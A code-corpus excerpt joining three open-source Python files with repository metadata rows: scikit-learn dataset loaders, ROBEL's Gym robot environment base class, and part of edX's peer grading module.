>>> from sklearn.datasets import load_digits
>>> digits = load_digits()
>>> print(digits.data.shape)
(1797, 64)
>>> import pylab as pl #doctest: +SKIP
>>> pl.gray() #doctest: +SKIP
>>> pl.matshow(digits.images[0]) #doctest: +SKIP
>>> pl.show() #doctest: +SKIP
"""
module_path = dirname(__file__)
data = np.loadtxt(join(module_path, 'data', 'digits.csv.gz'),
delimiter=',')
with open(join(module_path, 'descr', 'digits.rst')) as f:
descr = f.read()
target = data[:, -1]
flat_data = data[:, :-1]
images = flat_data.view()
images.shape = (-1, 8, 8)
if n_class < 10:
idx = target < n_class
flat_data, target = flat_data[idx], target[idx]
images = images[idx]
return Bunch(data=flat_data,
target=target.astype(np.int),
target_names=np.arange(10),
images=images,
DESCR=descr)
def load_diabetes():
"""Load and return the diabetes dataset (regression).
============== ==================
Samples total 442
Dimensionality 10
Features real, -.2 < x < .2
Targets integer 25 - 346
============== ==================
Read more in the :ref:`User Guide <datasets>`.
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn and 'target', the regression target for each
sample.
"""
base_dir = join(dirname(__file__), 'data')
data = np.loadtxt(join(base_dir, 'diabetes_data.csv.gz'))
target = np.loadtxt(join(base_dir, 'diabetes_target.csv.gz'))
return Bunch(data=data, target=target)
def load_linnerud():
"""Load and return the linnerud dataset (multivariate regression).
Samples total: 20
Dimensionality: 3 for both data and targets
Features: integer
Targets: integer
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are: 'data' and
'targets', the two multivariate datasets, with 'data' corresponding to
the exercise and 'targets' corresponding to the physiological
measurements, as well as 'feature_names' and 'target_names'.
"""
base_dir = join(dirname(__file__), 'data/')
# Read data
data_exercise = np.loadtxt(base_dir + 'linnerud_exercise.csv', skiprows=1)
data_physiological = np.loadtxt(base_dir + 'linnerud_physiological.csv',
skiprows=1)
# Read header
with open(base_dir + 'linnerud_exercise.csv') as f:
header_exercise = f.readline().split()
with open(base_dir + 'linnerud_physiological.csv') as f:
header_physiological = f.readline().split()
with open(dirname(__file__) + '/descr/linnerud.rst') as f:
descr = f.read()
return Bunch(data=data_exercise, feature_names=header_exercise,
target=data_physiological,
target_names=header_physiological,
DESCR=descr)
def load_boston():
"""Load and return the boston house-prices dataset (regression).
============== ==============
Samples total 506
Dimensionality 13
Features real, positive
Targets real 5. - 50.
============== ==============
Returns
-------
data : Bunch
Dictionary-like object, the interesting attributes are:
'data', the data to learn, 'target', the regression targets,
and 'DESCR', the full description of the dataset.
Examples
--------
>>> from sklearn.datasets import load_boston
>>> boston = load_boston()
>>> print(boston.data.shape)
(506, 13)
"""
module_path = dirname(__file__)
fdescr_name = join(module_path, 'descr', 'boston_house_prices.rst')
with open(fdescr_name) as f:
descr_text = f.read()
data_file_name = join(module_path, 'data', 'boston_house_prices.csv')
with open(data_file_name) as f:
data_file = csv.reader(f)
temp = next(data_file)
n_samples = int(temp[0])
n_features = int(temp[1])
data = np.empty((n_samples, n_features))
target = np.empty((n_samples,))
temp = next(data_file) # names of features
feature_names = np.array(temp)
for i, d in enumerate(data_file):
data[i] = np.asarray(d[:-1], dtype=np.float)
target[i] = np.asarray(d[-1], dtype=np.float)
return Bunch(data=data,
target=target,
# last column is target value
feature_names=feature_names[:-1],
DESCR=descr_text)
def load_sample_images():
"""Load sample images for image manipulation.
Loads both, ``china`` and ``flower``.
Returns
-------
data : Bunch
Dictionary-like object with the following attributes :
'images', the two sample images, 'filenames', the file
names for the images, and 'DESCR'
the full description of the dataset.
Examples
--------
To load the data and visualize the images:
>>> from sklearn.datasets import load_sample_images
>>> dataset = load_sample_images() #doctest: +SKIP
>>> len(dataset.images) #doctest: +SKIP
2
>>> first_img_data = dataset.images[0] #doctest: +SKIP
>>> first_img_data.shape #doctest: +SKIP
(427, 640, 3)
>>> first_img_data.dtype #doctest: +SKIP
dtype('uint8')
"""
# Try to import imread from scipy. We do this lazily here to prevent
# this module from depending on PIL.
try:
try:
from scipy.misc import imread
except ImportError:
from scipy.misc.pilutil import imread
except ImportError:
raise ImportError("The Python Imaging Library (PIL) "
"is required to load data from jpeg files")
module_path = join(dirname(__file__), "images")
with open(join(module_path, 'README.txt')) as f:
descr = f.read()
filenames = [join(module_path, filename)
for filename in os.listdir(module_path)
if filename.endswith(".jpg")]
# Load image data for each image in the source folder.
images = [imread(filename) for filename in filenames]
return Bunch(images=images,
filenames=filenames,
DESCR=descr)
def load_sample_image(image_name):
"""Load the numpy array of a single sample image
Parameters
-----------
image_name: {`china.jpg`, `flower.jpg`}
The name of the sample image loaded
Returns
-------
img: 3D array
The image as a numpy array: height x width x color
Examples
---------
>>> from sklearn.datasets import load_sample_image
>>> china = load_sample_image('china.jpg') # doctest: +SKIP
>>> china.dtype # doctest: +SKIP
dtype('uint8')
>>> china.shape # doctest: +SKIP
(427, 640, 3)
>>> flower = load_sample_image('flower.jpg') # doctest: +SKIP
>>> flower.dtype # doctest: +SKIP
dtype('uint8')
>>> flower.shape # doctest: +SKIP
(427, 640, 3)
"""
images = load_sample_images()
index = None
for i, filename in enumerate(images.filenames):
if filename.endswith(image_name):
index = i
break
if index is None:
raise AttributeError("Cannot find sample image: %s" % image_name)
return images.images[index]
| bsd-3-clause | -3,529,114,218,763,045,000 | -802,746,523,009,800,400 | 32.430631 | 79 | 0.588876 | false |
google-research/robel | robel/robot_env.py | 1 | 21356 | # Copyright 2019 The ROBEL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Base environment API for robotics tasks."""
import abc
import collections
from typing import Any, Dict, Optional, Sequence, Union, Tuple
import gym
from gym import spaces
from gym.utils import seeding
import numpy as np
from robel.components.builder import ComponentBuilder
from robel.simulation.sim_scene import SimScene, SimBackend
from robel.simulation.renderer import RenderMode
DEFAULT_RENDER_SIZE = 480
# The simulation backend to use by default.
DEFAULT_SIM_BACKEND = SimBackend.MUJOCO_PY
def make_box_space(low: Union[float, Sequence[float]],
high: Union[float, Sequence[float]],
shape: Optional[Tuple[int]] = None) -> gym.spaces.Box:
"""Returns a Box gym space."""
# HACK: Fallback for gym 0.9.x
# TODO(michaelahn): Consider whether we still need to support 0.9.x
try:
return spaces.Box(low, high, shape, dtype=np.float32)
except TypeError:
return spaces.Box(low, high, shape)
class RobotEnv(gym.Env, metaclass=abc.ABCMeta):
"""Base Gym environment for robotics tasks."""
def __init__(self,
sim_model: Any,
observation_keys: Optional[Sequence[str]] = None,
reward_keys: Optional[Sequence[str]] = None,
use_dict_obs: bool = False,
frame_skip: int = 1,
camera_settings: Optional[Dict] = None,
sim_backend: SimBackend = DEFAULT_SIM_BACKEND,
sticky_action_probability: float = 0.):
"""Initializes a robotics environment.
Args:
sim_model: The path to the simulation to load.
observation_keys: The keys of `get_obs_dict` to extract and flatten
for the default implementation of `_get_obs`. If this is not
set, `get_obs_dict` must return an OrderedDict.
reward_keys: The keys of `get_reward_dict` to extract and sum for
the default implementation of `_get_total_reward`. If this is
not set, `_get_total_reward` will sum all of the values.
use_dict_obs: If True, the observations will be returned as
dictionaries rather than as a flattened array. The observation
space of this environment will be a dictionary space.
frame_skip: The number of simulation steps per environment step.
This multiplied by the timestep defined in the model file is the
step duration.
camera_settings: Settings to apply to the free camera in simulation.
sim_backend: The simulation backend to use.
sticky_action_probability: Repeat previous action with this
probability. Default is 0 (no sticky actions).
"""
self._observation_keys = observation_keys
self._reward_keys = reward_keys
self._use_dict_obs = use_dict_obs
self._sticky_action_probability = sticky_action_probability
self._components = []
# The following spaces are initialized by their respective `initialize`
# methods, e.g. `_initialize_observation_space`.
self._observation_space = None
self._action_space = None
self._state_space = None
# The following are populated by step() and/or reset().
self.last_action = None
self.last_obs_dict = None
self.last_reward_dict = None
self.last_score_dict = None
self.is_done = False
self.step_count = 0
# Load the simulation.
self.sim_scene = SimScene.create(
sim_model, backend=sim_backend, frame_skip=frame_skip)
self.sim = self.sim_scene.sim
self.model = self.sim_scene.model
self.data = self.sim_scene.data
if camera_settings:
self.sim_scene.renderer.set_free_camera_settings(**camera_settings)
# Set common metadata for Gym environments.
self.metadata = {
'render.modes': ['human', 'rgb_array', 'depth_array'],
'video.frames_per_second': int(
np.round(1.0 / self.sim_scene.step_duration))
}
# Ensure gym does not try to patch `_step` and `_reset`.
self._gym_disable_underscore_compat = True
self.seed()
#===========================================================================
# Environment API.
# These methods should not be overridden by subclasses.
#===========================================================================
@property
def observation_space(self) -> gym.Space:
"""Returns the observation space of the environment.
The observation space is the return specification for `reset`,
`_get_obs`, and the first element of the returned tuple from `step`.
Subclasses should override `_initialize_observation_space` to customize
the observation space.
"""
# Initialize and cache the observation space on the first call.
if self._observation_space is None:
self._observation_space = self._initialize_observation_space()
assert self._observation_space is not None
return self._observation_space
@property
def action_space(self) -> gym.Space:
"""Returns the action space of the environment.
The action space is the argument specifiction for `step`.
Subclasses should override `_initialize_action_space` to customize the
action space.
"""
# Initialize and cache the action space on the first call.
if self._action_space is None:
self._action_space = self._initialize_action_space()
assert self._action_space is not None
return self._action_space
@property
def state_space(self) -> gym.Space:
"""Returns the state space of the environment.
The state space is the return specification for `get_state` and is the
argument specification for `set_state`.
Subclasses should override `_initialize_state_space` to customize the
state space.
"""
# Initialize and cache the state space on the first call.
if self._state_space is None:
self._state_space = self._initialize_state_space()
assert self._state_space is not None
return self._state_space
@property
def dt(self) -> float:
"""Returns the step duration of each step, in seconds."""
return self.sim_scene.step_duration
@property
def obs_dim(self) -> int:
"""Returns the size of the observation space.
NOTE: This is for compatibility with gym.MujocoEnv.
"""
if not isinstance(self.observation_space, spaces.Box):
raise NotImplementedError('`obs_dim` only supports Box spaces.')
return np.prod(self.observation_space.shape).item()
@property
def action_dim(self) -> int:
"""Returns the size of the action space."""
if not isinstance(self.action_space, spaces.Box):
raise NotImplementedError('`action_dim` only supports Box spaces.')
return np.prod(self.action_space.shape).item()
def seed(self, seed: Optional[int] = None) -> Sequence[int]:
"""Seeds the environment.
Args:
seed: The value to seed the random number generator with. If None,
uses a random seed.
"""
self.np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self) -> Any:
"""Resets the environment.
Args:
state: The state to reset to. This must match with the state space
of the environment.
Returns:
The initial observation of the environment after resetting.
"""
self.last_action = None
self.sim.reset()
self.sim.forward()
self._reset()
obs_dict = self.get_obs_dict()
self.last_obs_dict = obs_dict
self.last_reward_dict = None
self.last_score_dict = None
self.is_done = False
self.step_count = 0
return self._get_obs(obs_dict)
def step(self, action: Any) -> Tuple[Any, float, bool, Dict]:
"""Runs one timestep of the environment with the given action.
Subclasses must override 4 subcomponents of step:
- `_step`: Applies an action to the robot
- `get_obs_dict`: Returns the current observation of the robot.
- `get_reward_dict`: Calculates the reward for the step.
- `get_done`: Returns whether the episode should terminate.
Args:
action: An action to control the environment.
Returns:
observation: The observation of the environment after the timestep.
reward: The amount of reward obtained during the timestep.
done: Whether the episode has ended. `env.reset()` should be called
if this is True.
info: Auxiliary information about the timestep.
"""
# Perform the step.
action = self._preprocess_action(action)
self._step(action)
self.last_action = action
# Get the observation after the step.
obs_dict = self.get_obs_dict()
self.last_obs_dict = obs_dict
flattened_obs = self._get_obs(obs_dict)
# Get the rewards for the observation.
batched_action = np.expand_dims(np.atleast_1d(action), axis=0)
batched_obs_dict = {
k: np.expand_dims(np.atleast_1d(v), axis=0)
for k, v in obs_dict.items()
}
batched_reward_dict = self.get_reward_dict(batched_action,
batched_obs_dict)
# Calculate the total reward.
reward_dict = {k: v.item() for k, v in batched_reward_dict.items()}
self.last_reward_dict = reward_dict
reward = self._get_total_reward(reward_dict)
# Calculate the score.
batched_score_dict = self.get_score_dict(batched_obs_dict,
batched_reward_dict)
score_dict = {k: v.item() for k, v in batched_score_dict.items()}
self.last_score_dict = score_dict
# Get whether the episode should end.
dones = self.get_done(batched_obs_dict, batched_reward_dict)
done = dones.item()
self.is_done = done
# Combine the dictionaries as the auxiliary information.
info = collections.OrderedDict()
info.update(('obs/' + key, val) for key, val in obs_dict.items())
info.update(('reward/' + key, val) for key, val in reward_dict.items())
info['reward/total'] = reward
info.update(('score/' + key, val) for key, val in score_dict.items())
self.step_count += 1
return flattened_obs, reward, done, info
def render(
self,
mode: str = 'human',
width: int = DEFAULT_RENDER_SIZE,
height: int = DEFAULT_RENDER_SIZE,
camera_id: int = -1,
) -> Optional[np.ndarray]:
"""Renders the environment.
Args:
mode: The type of rendering to use.
- 'human': Renders to a graphical window.
- 'rgb_array': Returns the RGB image as an np.ndarray.
- 'depth_array': Returns the depth image as an np.ndarray.
width: The width of the rendered image. This only affects offscreen
rendering.
height: The height of the rendered image. This only affects
offscreen rendering.
camera_id: The ID of the camera to use. By default, this is the free
camera. If specified, only affects offscreen rendering.
Returns:
If mode is `rgb_array` or `depth_array`, a Numpy array of the
rendered pixels. Otherwise, returns None.
"""
if mode == 'human':
self.sim_scene.renderer.render_to_window()
elif mode == 'rgb_array':
return self.sim_scene.renderer.render_offscreen(
width, height, mode=RenderMode.RGB, camera_id=camera_id)
elif mode == 'depth_array':
return self.sim_scene.renderer.render_offscreen(
width, height, mode=RenderMode.DEPTH, camera_id=camera_id)
else:
raise NotImplementedError(mode)
return None
def close(self):
"""Cleans up any resources used by the environment."""
for component in self._components:
component.close()
self._components.clear()
self.sim_scene.close()
#===========================================================================
# Overridable Methods
#===========================================================================
@abc.abstractmethod
def _reset(self):
"""Task-specific reset for the environment."""
@abc.abstractmethod
def _step(self, action: np.ndarray):
"""Task-specific step for the environment."""
@abc.abstractmethod
def get_obs_dict(self) -> Dict[str, Any]:
"""Returns the current observation of the environment.
Returns:
A dictionary of observation values. This should be an ordered
dictionary if `observation_keys` isn't set.
"""
@abc.abstractmethod
def get_reward_dict(
self,
action: np.ndarray,
obs_dict: Dict[str, np.ndarray],
) -> Dict[str, np.ndarray]:
"""Returns the reward for the given action and observation.
Args:
action: A batch of actions.
obs_dict: A dictionary of batched observations. The batch dimension
matches the batch dimension of the actions.
Returns:
A dictionary of reward components. The values should be batched to
match the given actions and observations.
"""
@abc.abstractmethod
def get_score_dict(
self,
obs_dict: Dict[str, np.ndarray],
reward_dict: Dict[str, np.ndarray],
) -> Dict[str, np.ndarray]:
"""Returns a standardized measure of success for the environment.
Args:
obs_dict: A dictionary of batched observations.
reward_dict: A dictionary of batched rewards to correspond with the
observations.
Returns:
A dictionary of scores.
"""
def get_done(
self,
obs_dict: Dict[str, np.ndarray],
reward_dict: Dict[str, np.ndarray],
) -> np.ndarray:
"""Returns whether the episode should terminate.
Args:
obs_dict: A dictionary of batched observations.
reward_dict: A dictionary of batched rewards to correspond with the
observations.
Returns:
A boolean to denote if the episode should terminate. This should
have the same batch dimension as the observations and rewards.
"""
del obs_dict
return np.zeros_like(next(iter(reward_dict.values())), dtype=bool)
def get_state(self) -> Any:
"""Returns the current state of the environment."""
return (self.data.qpos.copy(), self.data.qvel.copy())
def set_state(self, state: Any):
"""Sets the state of the environment."""
qpos, qvel = state
self.data.qpos[:] = qpos
self.data.qvel[:] = qvel
self.sim.forward()
def _initialize_observation_space(self) -> gym.Space:
"""Returns the observation space to use for this environment.
The default implementation calls `_get_obs()` and returns a dictionary
space if the observation is a mapping, or a box space otherwise.
"""
observation = self._get_obs()
if isinstance(observation, collections.Mapping):
assert self._use_dict_obs
return spaces.Dict({
key: make_box_space(-np.inf, np.inf, shape=np.shape(value))
for key, value in observation.items()
})
return make_box_space(-np.inf, np.inf, shape=observation.shape)
def _initialize_action_space(self) -> gym.Space:
"""Returns the action space to use for this environment.
The default implementation uses the simulation's control actuator
dimensions as the action space, using normalized actions in [-1, 1].
"""
return make_box_space(-1.0, 1.0, shape=(self.model.nu,))
def _initialize_state_space(self) -> gym.Space:
"""Returns the state space to use for this environment.
The default implementation calls `get_state()` and returns a space
corresponding to the type of the state object:
- Mapping: Dict space
- List/Tuple: Tuple space
"""
state = self.get_state()
if isinstance(state, collections.Mapping):
return spaces.Dict({
key: make_box_space(-np.inf, np.inf, shape=np.shape(value))
for key, value in state.items() # pylint: disable=no-member
})
elif isinstance(state, (list, tuple)):
return spaces.Tuple([
make_box_space(-np.inf, np.inf, shape=np.shape(value))
for value in state
])
raise NotImplementedError(
'Override _initialize_state_space for state: {}'.format(state))
def _get_last_action(self) -> np.ndarray:
"""Returns the previous action, or zeros if no action has been taken."""
if self.last_action is None:
return np.zeros((self.action_dim,), dtype=self.action_space.dtype)
return self.last_action
def _preprocess_action(self, action: np.ndarray) -> np.ndarray:
"""Transforms an action before passing it to `_step()`.
Args:
action: The action in the environment's action space.
Returns:
The transformed action to pass to `_step()`.
"""
# Clip to the normalized action space.
action = np.clip(action, -1.0, 1.0)
# Prevent elements of the action from changing if sticky actions are
# being used.
if self._sticky_action_probability > 0 and self.last_action is not None:
sticky_indices = (
self.np_random.uniform() < self._sticky_action_probability)
action = np.where(sticky_indices, self.last_action, action)
return action
def _get_obs(self, obs_dict: Optional[Dict[str, np.ndarray]] = None) -> Any:
"""Returns the current observation of the environment.
This matches the environment's observation space.
"""
if obs_dict is None:
obs_dict = self.get_obs_dict()
if self._use_dict_obs:
if self._observation_keys:
obs = collections.OrderedDict(
(key, obs_dict[key]) for key in self._observation_keys)
else:
obs = obs_dict
else:
if self._observation_keys:
obs_values = (obs_dict[key] for key in self._observation_keys)
else:
assert isinstance(obs_dict, collections.OrderedDict), \
'Must use OrderedDict if not using `observation_keys`'
obs_values = obs_dict.values()
obs = np.concatenate([np.ravel(v) for v in obs_values])
return obs
def _get_total_reward(self, reward_dict: Dict[str, np.ndarray]) -> float:
"""Returns the total reward for the given reward dictionary.
The default implementation extracts the keys from `reward_keys` and sums
the values.
Args:
reward_dict: A dictionary of rewards. The values may have a batch
dimension.
Returns:
The total reward for the dictionary.
"""
# TODO(michaelahn): Enforce that the reward values are scalar.
if self._reward_keys:
reward_values = (reward_dict[key] for key in self._reward_keys)
else:
reward_values = reward_dict.values()
return np.sum(np.fromiter(reward_values, dtype=float))
def _add_component(self, component_builder: ComponentBuilder,
**component_kwargs) -> Any:
"""Creates a new component for this environment instance.
Args:
component_builder: The configured ComponentBuilder to build the
component with.
"""
# Build the component.
component = component_builder.build(
sim_scene=self.sim_scene,
random_state=self.np_random,
**component_kwargs)
self._components.append(component)
return component
| apache-2.0 | 4,666,393,830,502,631,000 | -2,270,375,703,700,011,000 | 37.548736 | 80 | 0.594306 | false |
rismalrv/edx-platform | common/lib/xmodule/xmodule/peer_grading_module.py | 56 | 29601 | import json
import logging
from datetime import datetime
from django.utils.timezone import UTC
from lxml import etree
from pkg_resources import resource_string
from xblock.fields import Dict, String, Scope, Boolean, Float, Reference
from xmodule.capa_module import ComplexEncoder
from xmodule.fields import Date, Timedelta
from xmodule.modulestore.exceptions import ItemNotFoundError, NoPathToItem
from xmodule.raw_module import RawDescriptor
from xmodule.timeinfo import TimeInfo
from xmodule.x_module import XModule, module_attr
from xmodule.open_ended_grading_classes.peer_grading_service import PeerGradingService, MockPeerGradingService
from xmodule.open_ended_grading_classes.grading_service_module import GradingServiceError
from xmodule.validation import StudioValidation, StudioValidationMessage
from open_ended_grading_classes import combined_open_ended_rubric
log = logging.getLogger(__name__)
# Make '_' a no-op so we can scrape strings
_ = lambda text: text
EXTERNAL_GRADER_NO_CONTACT_ERROR = "Failed to contact external graders. Please notify course staff."
MAX_ALLOWED_FEEDBACK_LENGTH = 5000
class PeerGradingFields(object):
use_for_single_location = Boolean(
display_name=_("Show Single Problem"),
help=_('When True, only the single problem specified by "Link to Problem Location" is shown. '
'When False, a panel is displayed with all problems available for peer grading.'),
default=False,
scope=Scope.settings
)
link_to_location = Reference(
display_name=_("Link to Problem Location"),
help=_('The location of the problem being graded. Only used when "Show Single Problem" is True.'),
default="",
scope=Scope.settings
)
graded = Boolean(
display_name=_("Graded"),
help=_('Defines whether the student gets credit for grading this problem. Only used when "Show Single Problem" is True.'),
default=False,
scope=Scope.settings
)
due = Date(
help=_("Due date that should be displayed."),
scope=Scope.settings)
graceperiod = Timedelta(
help=_("Amount of grace to give on the due date."),
scope=Scope.settings
)
student_data_for_location = Dict(
help=_("Student data for a given peer grading problem."),
scope=Scope.user_state
)
weight = Float(
display_name=_("Problem Weight"),
help=_("Defines the number of points each problem is worth. If the value is not set, each problem is worth one point."),
scope=Scope.settings, values={"min": 0, "step": ".1"},
default=1
)
display_name = String(
display_name=_("Display Name"),
help=_("Display name for this module"),
scope=Scope.settings,
default=_("Peer Grading Interface")
)
data = String(
help=_("Html contents to display for this module"),
default='<peergrading></peergrading>',
scope=Scope.content
)
class InvalidLinkLocation(Exception):
"""
Exception for the case in which a peer grading module tries to link to an invalid location.
"""
pass
class PeerGradingModule(PeerGradingFields, XModule):
"""
PeerGradingModule.__init__ takes the same arguments as xmodule.x_module:XModule.__init__
"""
_VERSION = 1
js = {
'coffee': [
resource_string(__name__, 'js/src/peergrading/peer_grading.coffee'),
resource_string(__name__, 'js/src/peergrading/peer_grading_problem.coffee'),
resource_string(__name__, 'js/src/javascript_loader.coffee'),
],
'js': [
resource_string(__name__, 'js/src/collapsible.js'),
]
}
js_module_name = "PeerGrading"
css = {'scss': [resource_string(__name__, 'css/combinedopenended/display.scss')]}
def __init__(self, *args, **kwargs):
super(PeerGradingModule, self).__init__(*args, **kwargs)
# Copy this to a new variable so that we can edit it if needed.
# We need to edit it if the linked module cannot be found, so
# we can revert to panel model.
self.use_for_single_location_local = self.use_for_single_location
# We need to set the location here so the child modules can use it.
self.runtime.set('location', self.location)
if self.runtime.open_ended_grading_interface:
self.peer_gs = PeerGradingService(self.system.open_ended_grading_interface, self.system.render_template)
else:
self.peer_gs = MockPeerGradingService()
if self.use_for_single_location_local:
linked_descriptors = self.descriptor.get_required_module_descriptors()
if len(linked_descriptors) == 0:
error_msg = "Peer grading module {0} is trying to use single problem mode without "
"a location specified.".format(self.location)
log.error(error_msg)
# Change module over to panel mode from single problem mode.
self.use_for_single_location_local = False
else:
self.linked_problem = self.system.get_module(linked_descriptors[0])
try:
self.timeinfo = TimeInfo(self.due, self.graceperiod)
except Exception:
log.error("Error parsing due date information in location {0}".format(self.location))
raise
self.display_due_date = self.timeinfo.display_due_date
try:
self.student_data_for_location = json.loads(self.student_data_for_location)
except Exception: # pylint: disable=broad-except
# OK with this broad exception because we just want to continue on any error
pass
@property
def ajax_url(self):
"""
Returns the `ajax_url` from the system, with any trailing '/' stripped off.
"""
ajax_url = self.system.ajax_url
if not ajax_url.endswith("/"):
ajax_url += "/"
return ajax_url
def closed(self):
return self._closed(self.timeinfo)
def _closed(self, timeinfo):
if timeinfo.close_date is not None and datetime.now(UTC()) > timeinfo.close_date:
return True
return False
def _err_response(self, msg):
"""
Return a HttpResponse with a json dump with success=False, and the given error message.
"""
return {'success': False, 'error': msg}
def _check_required(self, data, required):
actual = set(data.keys())
missing = required - actual
if len(missing) > 0:
return False, "Missing required keys: {0}".format(', '.join(missing))
else:
return True, ""
def get_html(self):
"""
Needs to be implemented by inheritors. Renders the HTML that students see.
@return:
"""
if self.closed():
return self.peer_grading_closed()
if not self.use_for_single_location_local:
return self.peer_grading()
else:
# b/c handle_ajax expects serialized data payload and directly calls peer_grading
return self.peer_grading_problem({'location': self.link_to_location.to_deprecated_string()})['html']
def handle_ajax(self, dispatch, data):
"""
Needs to be implemented by child modules. Handles AJAX events.
@return:
"""
handlers = {
'get_next_submission': self.get_next_submission,
'show_calibration_essay': self.show_calibration_essay,
'is_student_calibrated': self.is_student_calibrated,
'save_grade': self.save_grade,
'save_calibration_essay': self.save_calibration_essay,
'problem': self.peer_grading_problem,
}
if dispatch not in handlers:
# This is a dev_facing_error
log.error("Cannot find {0} in handlers in handle_ajax function for open_ended_module.py".format(dispatch))
# This is a dev_facing_error
return json.dumps({'error': 'Error handling action. Please try again.', 'success': False})
data_dict = handlers[dispatch](data)
return json.dumps(data_dict, cls=ComplexEncoder)
def query_data_for_location(self, location):
student_id = self.system.anonymous_student_id
success = False
response = {}
try:
response = self.peer_gs.get_data_for_location(location, student_id)
_count_graded = response['count_graded']
_count_required = response['count_required']
success = True
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error getting location data from controller for location %s, student %s", location, student_id)
return success, response
def get_progress(self):
pass
def get_score(self):
max_score = None
score = None
weight = self.weight
#The old default was None, so set to 1 if it is the old default weight
if weight is None:
weight = 1
score_dict = {
'score': score,
'total': max_score,
}
if not self.use_for_single_location_local or not self.graded:
return score_dict
try:
count_graded = self.student_data_for_location['count_graded']
count_required = self.student_data_for_location['count_required']
except:
success, response = self.query_data_for_location(self.link_to_location)
if not success:
log.exception(
"No instance data found and could not get data from controller for loc {0} student {1}".format(
self.system.location.to_deprecated_string(), self.system.anonymous_student_id
))
return None
count_graded = response['count_graded']
count_required = response['count_required']
if count_required > 0 and count_graded >= count_required:
# Ensures that once a student receives a final score for peer grading, that it does not change.
self.student_data_for_location = response
score = int(count_graded >= count_required and count_graded > 0) * float(weight)
total = float(weight)
score_dict['score'] = score
score_dict['total'] = total
return score_dict
def max_score(self):
''' Maximum score. Two notes:
* This is generic; in abstract, a problem could be 3/5 points on one
randomization, and 5/7 on another
'''
max_grade = None
if self.use_for_single_location_local and self.graded:
max_grade = self.weight
return max_grade
def get_next_submission(self, data):
"""
Makes a call to the grading controller for the next essay that should be graded
Returns a json dict with the following keys:
'success': bool
'submission_id': a unique identifier for the submission, to be passed back
with the grade.
'submission': the submission, rendered as read-only html for grading
'rubric': the rubric, also rendered as html.
'submission_key': a key associated with the submission for validation reasons
'error': if success is False, will have an error message with more info.
"""
required = set(['location'])
success, message = self._check_required(data, required)
if not success:
return self._err_response(message)
grader_id = self.system.anonymous_student_id
location = data['location']
try:
response = self.peer_gs.get_next_submission(location, grader_id)
return response
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error getting next submission. server url: %s location: %s, grader_id: %s", self.peer_gs.url, location, grader_id)
# This is a student_facing_error
return {'success': False,
'error': EXTERNAL_GRADER_NO_CONTACT_ERROR}
def save_grade(self, data):
"""
Saves the grade of a given submission.
Input:
The request should have the following keys:
location - problem location
submission_id - id associated with this submission
submission_key - submission key given for validation purposes
score - the grade that was given to the submission
feedback - the feedback from the student
Returns
A json object with the following keys:
success: bool indicating whether the save was a success
error: if there was an error in the submission, this is the error message
"""
required = ['location', 'submission_id', 'submission_key', 'score', 'feedback', 'submission_flagged', 'answer_unknown']
if data.get("submission_flagged", False) in ["false", False, "False", "FALSE"]:
required.append("rubric_scores[]")
success, message = self._check_required(data, set(required))
if not success:
return self._err_response(message)
success, message = self._check_feedback_length(data)
if not success:
return self._err_response(message)
data_dict = {k: data.get(k) for k in required}
if 'rubric_scores[]' in required:
data_dict['rubric_scores'] = data.getall('rubric_scores[]')
data_dict['grader_id'] = self.system.anonymous_student_id
try:
response = self.peer_gs.save_grade(**data_dict)
success, location_data = self.query_data_for_location(data_dict['location'])
#Don't check for success above because the response = statement will raise the same Exception as the one
#that will cause success to be false.
response.update({'required_done': False})
if 'count_graded' in location_data and 'count_required' in location_data and int(location_data['count_graded']) >= int(location_data['count_required']):
response['required_done'] = True
return response
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error saving grade to open ended grading service. server url: %s", self.peer_gs.url)
# This is a student_facing_error
return {
'success': False,
'error': EXTERNAL_GRADER_NO_CONTACT_ERROR
}
def is_student_calibrated(self, data):
"""
Calls the grading controller to see if the given student is calibrated
on the given problem
Input:
In the request, we need the following arguments:
location - problem location
Returns:
Json object with the following keys
success - bool indicating whether or not the call was successful
calibrated - true if the grader has fully calibrated and can now move on to grading
- false if the grader is still working on calibration problems
total_calibrated_on_so_far - the number of calibration essays for this problem
that this grader has graded
"""
required = set(['location'])
success, message = self._check_required(data, required)
if not success:
return self._err_response(message)
grader_id = self.system.anonymous_student_id
location = data['location']
try:
response = self.peer_gs.is_student_calibrated(location, grader_id)
return response
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error from open ended grading service. server url: %s, grader_id: %s, location: %s", self.peer_gs.url, grader_id, location)
# This is a student_facing_error
return {
'success': False,
'error': EXTERNAL_GRADER_NO_CONTACT_ERROR
}
def show_calibration_essay(self, data):
"""
Fetch the next calibration essay from the grading controller and return it
Inputs:
In the request
location - problem location
Returns:
A json dict with the following keys
'success': bool
'submission_id': a unique identifier for the submission, to be passed back
with the grade.
'submission': the submission, rendered as read-only html for grading
'rubric': the rubric, also rendered as html.
'submission_key': a key associated with the submission for validation reasons
'error': if success is False, will have an error message with more info.
"""
required = set(['location'])
success, message = self._check_required(data, required)
if not success:
return self._err_response(message)
grader_id = self.system.anonymous_student_id
location = data['location']
try:
response = self.peer_gs.show_calibration_essay(location, grader_id)
return response
except GradingServiceError:
# This is a dev_facing_error
log.exception("Error from open ended grading service. server url: %s, location: %s", self.peer_gs.url, location)
# This is a student_facing_error
return {'success': False,
'error': EXTERNAL_GRADER_NO_CONTACT_ERROR}
# if we can't parse the rubric into HTML,
except etree.XMLSyntaxError:
# This is a dev_facing_error
log.exception("Cannot parse rubric string.")
# This is a student_facing_error
return {'success': False,
'error': 'Error displaying submission. Please notify course staff.'}
def save_calibration_essay(self, data):
"""
Saves the grader's grade of a given calibration.
Input:
The request should have the following keys:
location - problem location
submission_id - id associated with this submission
submission_key - submission key given for validation purposes
score - the grade that was given to the submission
feedback - the feedback from the student
Returns
A json object with the following keys:
success: bool indicating whether the save was a success
error: if there was an error in the submission, this is the error message
actual_score: the score that the instructor gave to this calibration essay
"""
